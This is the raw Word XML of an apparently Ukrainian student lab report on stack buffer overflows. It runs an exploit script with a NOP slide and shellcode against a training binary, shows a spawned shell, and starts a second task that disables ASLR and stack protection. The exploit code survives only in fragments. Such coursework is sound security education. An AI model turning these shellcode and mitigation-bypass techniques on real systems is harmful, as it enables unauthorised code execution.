      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008175B8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ш</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>елкод.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E68177D" w14:textId="77777777" w:rsidR="00105821" w:rsidRPr="00105821" w:rsidRDefault="00105821" w:rsidP="001058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105821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lastRenderedPageBreak/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00105821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main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c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sm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hellcraft.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h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nop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8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90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"nop" opcode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Buffer overflow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05821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8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ax before "cmp eax, 0x539"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64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337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.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8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105821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sp before "ret"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64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7fffffffd4b8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Address of the nop slide in the stack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nop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8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10582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20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Nop slide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c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nd_bad_bytes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uf = cyclic(200)</w:t>
      </w:r>
      <w:r w:rsidRPr="0010582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10582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05821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BUFFER"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10582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eractive</w:t>
      </w:r>
      <w:r w:rsidRPr="0010582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705254C9" w14:textId="77777777" w:rsidR="00105821" w:rsidRPr="00105821" w:rsidRDefault="00105821" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E90CD62" w14:textId="77777777" w:rsidR="00153F34" w:rsidRDefault="00153F34" w:rsidP="003B0C4F">
      <w:pPr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</w:pPr>
    </w:p>
    <w:p w14:paraId="508B9CAA" w14:textId="44FBDC1C" w:rsidR="00AD3641" w:rsidRPr="00733A64" w:rsidRDefault="00992DCF" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C654F5">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>Запустимо експлойт</w:t>
      </w:r>
      <w:r w:rsidR="00C654F5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C654F5" w:rsidRPr="00805AE3">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>task1.</w:t>
      </w:r>
      <w:r w:rsidR="00C654F5" w:rsidRPr="00EA78D5">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidRPr="00C654F5">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidR="00733A64" w:rsidRPr="00695755">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">родебажимо </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00733A64" w:rsidRPr="00587F62">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>target.amd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00733A64" w:rsidRPr="00587F62">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00733A64" w:rsidRPr="00695755">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00733A64" w:rsidRPr="00695755">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidR="00733A64" w:rsidRPr="00733A64">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>GDB</w:t>
      </w:r>
      <w:r w:rsidR="00733A64" w:rsidRPr="00695755">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433BA74F" w14:textId="71A68081" w:rsidR="00E17B98" w:rsidRPr="00803FAB" w:rsidRDefault="00902413" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00803FAB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="00103CFA" w:rsidRPr="00803FAB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>python3 task1.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F68EDB0" w14:textId="2F57F872" w:rsidR="00053C3A" w:rsidRPr="002C640E" w:rsidRDefault="002C640E" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>На другому брейкпо</w:t>
      </w:r>
      <w:r w:rsidR="006371E7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>і</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>нті (</w:t>
      </w:r>
      <w:r w:rsidR="001E3EB9" w:rsidRPr="001E3EB9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x40131c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>) вив</w:t>
      </w:r>
      <w:r w:rsidR="00763E23">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>едемо стек:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A385D03" w14:textId="3F3355A2" w:rsidR="00B105AF" w:rsidRPr="00843402" w:rsidRDefault="00B105AF" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843402">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>gef</w:t>
      </w:r>
      <w:r w:rsidRPr="00843402">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00843402">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00843402">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>x/40gx $rsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744AEE7A" w14:textId="5D3E0475" w:rsidR="005D0F30" w:rsidRPr="00153F1C" w:rsidRDefault="00E2375A" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F3DDFDC" wp14:editId="081B7D68">
            <wp:extent cx="5676900" cy="4948979"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="110757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4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400" cy="49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DED8" w14:textId="5FC6EF27" w:rsidR="005D0F30" w:rsidRDefault="00153F1C" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Бачимо, що </w:t>
      </w:r>
      <w:r w:rsidR="00DC347F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">адреса </w:t>
      </w:r>
      <w:r w:rsidR="00DC347F" w:rsidRPr="00DC347F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x7fffffffd4b8</w:t>
      </w:r>
      <w:r w:rsidR="00DC347F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> вказує </w:t>
      </w:r>
      <w:r w:rsidR="00DC347F" w:rsidRPr="000E1D09">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="00DC347F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>9090</w:t>
      </w:r>
      <w:r w:rsidR="00DC347F" w:rsidRPr="000E1D09">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>…90</w:t>
      </w:r>
      <w:r w:rsidR="000E1D09">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000E1D09">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>тобто на лан</w:t>
      </w:r>
      <w:r w:rsidR="008A41AB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ц</w:t>
      </w:r>
      <w:r w:rsidR="000E1D09">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">южок </w:t>
      </w:r>
      <w:r w:rsidR="000E1D09">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>"nop"</w:t>
      </w:r>
      <w:r w:rsidR="000D3132">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. А одразу </w:t>
      </w:r>
      <w:r w:rsidR="00025140">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ж </w:t>
      </w:r>
      <w:r w:rsidR="000D3132">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>пі</w:t>
      </w:r>
      <w:r w:rsidR="00025140">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="000D3132">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ля </w:t>
      </w:r>
      <w:r w:rsidR="00720C96">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>цього ланцюжка</w:t>
      </w:r>
      <w:r w:rsidR="009B7DB9" w:rsidRPr="009B7DB9">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009B7DB9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">починаючи з адреси </w:t>
      </w:r>
      <w:r w:rsidR="009B7DB9" w:rsidRPr="009B7DB9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x7fffffffd50</w:t>
      </w:r>
      <w:r w:rsidR="009B7DB9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00025140">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00720C96">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> йде шелкод.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4739B056" w14:textId="77777777" w:rsidR="00CA241F" w:rsidRDefault="00CA241F" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18767305" w14:textId="6AF0BF3B" w:rsidR="00CA241F" w:rsidRDefault="00BE2627" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Продовжимо виконання</w:t>
      </w:r>
      <w:r w:rsidR="00534043">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> і отримаємо шел</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55078999" w14:textId="16BF0645" w:rsidR="00BE2627" w:rsidRPr="00CA241F" w:rsidRDefault="00BE2627" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39603459" wp14:editId="1712F482">
            <wp:extent cx="6645910" cy="2284730"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="158219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9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F7E3" w14:textId="34A1E1C8" w:rsidR="000D3132" w:rsidRDefault="000D3132" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08BF2636" w14:textId="67A27B58" w:rsidR="00153B41" w:rsidRDefault="00B346E7" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Виконаємо експлойт</w:t>
      </w:r>
      <w:r w:rsidR="00C74D68">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> без дебагу:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5390CEEE" w14:textId="77777777" w:rsidR="00F447AB" w:rsidRPr="00F447AB" w:rsidRDefault="00F447AB" w:rsidP="00F447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F447A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F447A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447A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F447A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447A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F447A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447A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F447A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0BFC72F8" w14:textId="77777777" w:rsidR="008234B1" w:rsidRPr="00F447AB" w:rsidRDefault="008234B1" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="532130AA" w14:textId="77777777" w:rsidR="00F447AB" w:rsidRPr="00803FAB" w:rsidRDefault="00F447AB" w:rsidP="00F447AB">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00803FAB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>$ python3 task1.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D958F68" w14:textId="4DB9F72D" w:rsidR="0017498F" w:rsidRPr="000E1D09" w:rsidRDefault="00331BD1" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="724C5DD3" wp14:editId="6EF30551">
            <wp:extent cx="6645910" cy="4110990"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="65781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1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7DA4" w14:textId="77777777" w:rsidR="00DD3E2C" w:rsidRPr="00DC347F" w:rsidRDefault="00DD3E2C" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697D00CB" w14:textId="7A610A99" w:rsidR="003065B1" w:rsidRPr="00DC347F" w:rsidRDefault="003065B1" w:rsidP="003B0C4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B82BAA" w14:textId="77777777" w:rsidR="008546BE" w:rsidRDefault="00BD58AC" w:rsidP="008546BE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD58AC">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>У Вашому варiантi ЛР 1 видалiть функцiю win(), отримайте шелл у</w:t>
      </w:r>
      <w:r w:rsidR="007C38C7">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD58AC">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>випадку без ASLR</w:t>
      </w:r>
      <w:r w:rsidR="00AC6D15">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB98251" w14:textId="707FCA8A" w:rsidR="00CD03FF" w:rsidRPr="00CA6D02" w:rsidRDefault="00CD03FF" w:rsidP="00CD03FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008928CC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ідключимо </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD03FF">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidR="00CA6D02">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C92E32" w14:textId="77777777" w:rsidR="00CD03FF" w:rsidRPr="000160FF" w:rsidRDefault="00CD03FF" w:rsidP="00CD03FF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysctl</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>randomize</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>va</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>space</w:t>
      </w:r>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FE2D05" w14:textId="77777777" w:rsidR="00CD03FF" w:rsidRPr="000160FF" w:rsidRDefault="00CD03FF" w:rsidP="00CD03FF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sysctl </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernel.randomize</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000160FF">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_va_space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62121891" w14:textId="03075783" w:rsidR="00CD03FF" w:rsidRDefault="00E52876" w:rsidP="00CD03FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BB4F05D" wp14:editId="2F06DCC5">
            <wp:extent cx="6645910" cy="871855"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="64806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3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CECD" w14:textId="77777777" w:rsidR="00E52876" w:rsidRPr="004C1ABA" w:rsidRDefault="00E52876" w:rsidP="00CD03FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B456756" w14:textId="479BAF6B" w:rsidR="00CD03FF" w:rsidRPr="00FE4741" w:rsidRDefault="00CD03FF" w:rsidP="00CD03FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Ск</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidR="00CD59F1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">пілюємо програму </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00587F62">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>target.amd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00587F62">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="00493613">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B21789">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">з </w:t>
      </w:r>
      <w:r w:rsidR="00B21789">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609A4753" w14:textId="6AC7DEC2" w:rsidR="00CD03FF" w:rsidRPr="006E0475" w:rsidRDefault="00CD03FF" w:rsidP="00CD03FF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E0475">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="00493613" w:rsidRPr="00493613">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>gcc -no-pie -fno-stack-protector -w -g target.c -o target.amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AF2960" w14:textId="77777777" w:rsidR="00CD03FF" w:rsidRPr="006E0475" w:rsidRDefault="00CD03FF" w:rsidP="00CD03FF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E0475">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>$ checksec --file=target.amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD302C4" w14:textId="022888D4" w:rsidR="00CD03FF" w:rsidRDefault="00236CDF" w:rsidP="00CD03FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6815EA28" wp14:editId="26CB663E">
            <wp:extent cx="6645910" cy="1216660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="127673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5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1091" w14:textId="77777777" w:rsidR="00CD03FF" w:rsidRDefault="00CD03FF" w:rsidP="00CD03FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12EC1F86" w14:textId="38780C64" w:rsidR="00A249E3" w:rsidRPr="00EA78D5" w:rsidRDefault="002379A0" w:rsidP="00CD03FF">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Ставим</w:t>
      </w:r>
      <w:r w:rsidR="00CD03FF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">о брейкпоїнти в </w:t>
      </w:r>
      <w:r w:rsidR="004E62ED">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>тих же місцях</w:t>
      </w:r>
      <w:r w:rsidR="00A249E3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, що і в попередньому завданні</w:t>
      </w:r>
      <w:r w:rsidR="007C5FF8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C2535B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidR="007C5FF8" w:rsidRPr="004C56AC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>breaks64.gdb</w:t>
      </w:r>
      <w:r w:rsidR="00B40BE7" w:rsidRPr="00B40BE7">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3A6714" w14:textId="77777777" w:rsidR="00B40BE7" w:rsidRPr="00EA78D5" w:rsidRDefault="00B40BE7" w:rsidP="00B40BE7">
      <w:r w:rsidRPr="00B40BE7">
        <w:rPr>
